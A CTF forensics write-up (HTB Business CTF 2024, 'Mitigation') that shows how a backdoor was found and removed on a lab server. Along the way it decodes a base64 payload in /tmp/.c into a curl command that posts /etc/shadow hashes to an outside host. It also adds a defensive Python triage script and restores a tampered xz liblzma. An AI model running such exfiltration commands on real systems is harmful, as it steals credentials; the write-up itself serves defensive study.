Mitigation
Challenge
- CTF: HTB Business CTF 2024: The Vault of Hope
- Name: Mitigation
- Category: Forensics
- Difficulty: Medium
- Points: 500
- Description: Having now gathered all the intelligence, you are now making the final preparations to attack the vault! You connect back to your server to review some important evidence one last time! However, as soon as you connect you discover things are in complete disorder. You check the root directory and you find /root/backdoor.log, clearly evidence of an active backdoor, set in place to hinder your assault on the Vault! Eliminate the backdoor in order to continue with your plans!
- Note: A new line is added in the logfile approx every minute indicating the status of the backdoor
- Note 2: Connect to the server using SSH and root:toor as credentials
- Note 3: You need to be connected to the CTF VPN in order to reach the server
Writeup
sshpass -p 'toor' ssh [email protected]
Linux e5d2ef9f9174 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@e5d2ef9f9174:~#
Run linpeas.sh …
sshpass -p 'toor' scp /var/www/html/linpeas.sh [email protected]:/tmp/
A hidden file in /tmp called .c; does it contain a private key?
-rw-r--r-- 1 root root 152 May 20 00:09 /tmp/.c
root@e5d2ef9f9174:~# cat /tmp/.c
Y3VybCAtWCBQT1NUIC1kICJkYXRhPSQoYmFzZTY0IC9ldGM
vc2hhZG93KSZpPSQoaG9zdG5hbWUgLUkgfCBhd2sgJ3twcm
ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL
3NhdmU=
Decoded (base64 -d /tmp/.c), the four chunks form a single command that POSTs the password hashes from /etc/shadow, together with the host's IP, to an external server:
curl -X POST -d "data=$(base64 /etc/shadow)&i=$(hostname -I | awk '{print $1}')" https://vault.htb/hashes/save
Process monitoring (pspy output) shows the chunks being appended to /tmp/.c one line at a time, which matches the "one line per minute" note in the description:
2024/05/20 00:13:40 CMD: UID=0 PID=7103 | sh -c echo ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL >> /tmp/.c
pspy also shows the dynamic MOTD hook, which runs every script in /etc/update-motd.d on each login and is therefore worth checking for planted scripts:
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
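As an added example that is not part of the original writeup, the Python script below does the /tmp/.c triage described above: it parses a pspy-style "echo X >> FILE" line, reassembles the drip-fed base64 chunks (tolerating a file that is still being written), and flags the exfiltration indicators in the decoded command. The sample chunks and log line are constructed from what the page shows; the indicator names and regex are my own.

```python
import base64
import binascii
import re

# pspy-style line as seen on this page: "<date> <time> CMD: UID=0 PID=7103 | sh -c echo <chunk> >> /tmp/.c"
PSPY_APPEND_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+) PID=(?P<pid>\d+) \| "
    r"sh -c echo (?P<chunk>\S+) >> (?P<target>\S+)$")
# Substrings a defender wants flagged in a decoded payload (indicator names are ours).
INDICATORS = {
    "reads /etc/shadow": "/etc/shadow",
    "outbound HTTP POST": "curl -X POST",
    "leaks local IP": "hostname -I",
    "contacts vault.htb": "vault.htb",
}

def parse_pspy_append(line):
    """Return (target_file, chunk) for an 'echo X >> FILE' pspy line, else None."""
    m = PSPY_APPEND_RE.match(line.strip())
    return (m.group("target"), m.group("chunk")) if m else None

def decode_chunks(chunks):
    """Join drip-fed base64 fragments and decode them as one payload.
    Only complete 4-char groups are decoded, so a file still being written
    (one chunk per minute) yields the prefix written so far, not a padding error."""
    joined = "".join(c.strip() for c in chunks)
    joined = joined[: len(joined) - len(joined) % 4]
    try:
        return base64.b64decode(joined, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""  # not base64 at all: report nothing rather than garbage

def classify(payload):
    """Names of the INDICATORS present in a decoded payload, in table order."""
    return [name for name, needle in INDICATORS.items() if needle in payload]

# Constructed sample input, copied from the /tmp/.c contents and the pspy line above.
SAMPLE_CHUNKS = [
    "Y3VybCAtWCBQT1NUIC1kICJkYXRhPSQoYmFzZTY0IC9ldGM",
    "vc2hhZG93KSZpPSQoaG9zdG5hbWUgLUkgfCBhd2sgJ3twcm",
    "ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL",
    "3NhdmU=",
]
SAMPLE_PSPY = ("2024/05/20 00:13:40 CMD: UID=0 PID=7103 | sh -c echo "
               "ludCAkMX0nKSIgaHR0cHM6Ly92YXVsdC5odGIvaGFzaGVzL >> /tmp/.c")

if __name__ == "__main__":
    print(parse_pspy_append(SAMPLE_PSPY))
    command = decode_chunks(SAMPLE_CHUNKS)
    print(command, classify(command), sep="\n")
```

Run against the real file with `decode_chunks(open("/tmp/.c").read().splitlines())`; an empty classify() result on a non-empty decode means the payload uses techniques the indicator table does not cover, not that it is benign.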
root@e5d2ef9f9174:/etc/ssh# find . -ls
396815 8 drwxr-xr-x 1 root root 4096 May 16 14:01 .
51937 4 -rw------- 1 root root 513 May 16 13:59 ./ssh_host_ecdsa_key
51939 4 -rw------- 1 root root 411 May 16 13:59 ./ssh_host_ed25519_key
35690 564 -rw-r--r-- 1 root root 573928 Dec 19 14:51 ./moduli
51936 4 -rw-r--r-- 1 root root 574 May 16 13:59 ./ssh_host_rsa_key.pub
35664 4 drwxr-xr-x 2 root root 4096 Dec 19 14:51 ./ssh_config.d
35692 4 drwxr-xr-x 2 root root 4096 Dec 19 14:51 ./sshd_config.d
51942 4 -rw-r--r-- 1 root root 102 May 16 13:59 ./ssh_host_ed25519_key.pub
51938 4 -rw-r--r-- 1 root root 182 May 16 13:59 ./ssh_host_ecdsa_key.pub
35662 4 -rw-r--r-- 1 root root 1650 Dec 19 14:51 ./ssh_config
396823 4 -rw-r--r-- 1 root root 3228 May 16 14:01 ./sshd_config
51935 4 -rw------- 1 root root 2610 May 16 13:59 ./ssh_host_rsa_key
root@e5d2ef9f9174:~# rm /tmp/.c
Find Rootkits
wget ftp://ftp.chkrootkit.org/pub/seg/pac/chkrootkit-m.zip
unzip chkrootkit-m.zip
sshpass -p 'toor' scp ./chkrootkit-m/* [email protected]:/tmp/
Install dependencies:
apt install net-tools make binutils zip systemctl vim unar build-essential debsums
Update SSH server (port 22 -> 2222)
root@e5d2ef9f9174:/tmp# service ssh restart
Restarting OpenBSD Secure Shell server: sshd.
Hidden Files/Dir:
find / -type f -name ".*" -ls
debsums compares the installed files against the package checksums and reports the tampered library:
root@e5d2ef9f9174:/tmp/chkrootkit-0.58b# debsums --all --silent
debsums: changed file /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 (from liblzma5:amd64 package)
liblzma 5.6.1 is the xz-utils release that shipped the backdoor. Replace the modified library with a clean copy (test.b64 is a base64-encoded copy of the library) and record the hash of the restored file:
rm /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
cat test.b64 | base64 -d > /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
md5sum /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
90764eaae5baa3e93c789e4692968b4a /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
Broadcast message from root@e5d2ef9f9174 (somewhere) (Mon May 20 00:56:47 2024)
Backdoor eliminated! Check /
root@e5d2ef9f9174:/tmp/chkrootkit-0.58b# cat /flag.txt
HTB{oH_xZ_w3_f0uNd_tH3_b4cKd0or}
Flag: HTB{oH_xZ_w3_f0uNd_tH3_b4cKd0or}